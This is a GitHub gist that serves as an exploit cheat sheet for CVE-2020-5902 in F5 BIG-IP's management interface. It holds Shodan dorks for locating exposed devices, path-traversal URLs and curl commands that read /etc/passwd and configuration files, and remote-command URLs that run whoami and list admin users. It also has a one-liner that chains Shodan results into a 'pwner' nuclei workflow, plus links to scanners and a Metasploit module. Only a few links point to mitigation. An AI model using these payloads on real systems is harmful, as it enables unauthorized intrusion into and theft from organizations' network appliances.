Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC πŸ”₯πŸ§±πŸ”¨πŸ‘€


Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

πŸ”ΈLFI

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

πŸ”ΈRCE πŸ’¦

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

🎯 Manuel POC πŸ”₯

curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | grep -q Vulnerable && printf '\033[0;31mVulnerable\n' || printf '\033[0;32mNot Vulnerable\n'


πŸ“œ Nuclei Detect CVE-2020-5902

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml

nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt

image


image

πŸ§±πŸ”¨ Jaeles Detect CVE-2020-5902 πŸ”‹

https://github.com/jaeles-project/jaeles-signatures/blob/master/common/bigip-cve-2020-5902.yaml

jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt

image


πŸ”Ž NMAP Script for CVE-2020-5902


wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse

image

🚩CVE-2020-5902 Scanner Python Script

⭐️🚩 https://github.com/jas502n/CVE-2020-5902


https://github.com/dunderhay/CVE-2020-5902

https://github.com/aqhmal/CVE-2020-5902-Scanner

🌐 Online BIG-IP F5 CVE-2020-5902 Checker

- πŸ€·β€β™‚οΈ Note: Not Safe(it may be collecting information in the background.)

http://threatintel.xyz/F5checker.php

πŸ’‘ Automate Find CVE-2020-5902 πŸ”Ž

https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77

shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml

πŸ”¨πŸ’£ RCE Metasploit CVE-2020-5902

https://github.com/rapid7/metasploit-framework/pull/13807#

modules/exploits/linux/http/f5_bigip_tmui_rce.rb

https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4

🚨RCE πŸ’’

https://twitter.com/chybeta/status/1279807030740516865?s=21


https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902


https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/

πŸ“K52145254: TMUI RCE vulnerability CVE-2020-5902 Mitigation

https://support.f5.com/csp/article/K52145254?sf235665517=1


Explaining CVE 2020-5902 and how to mitigate

https://www.youtube.com/watch?v=-_v8D4MWPCc

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.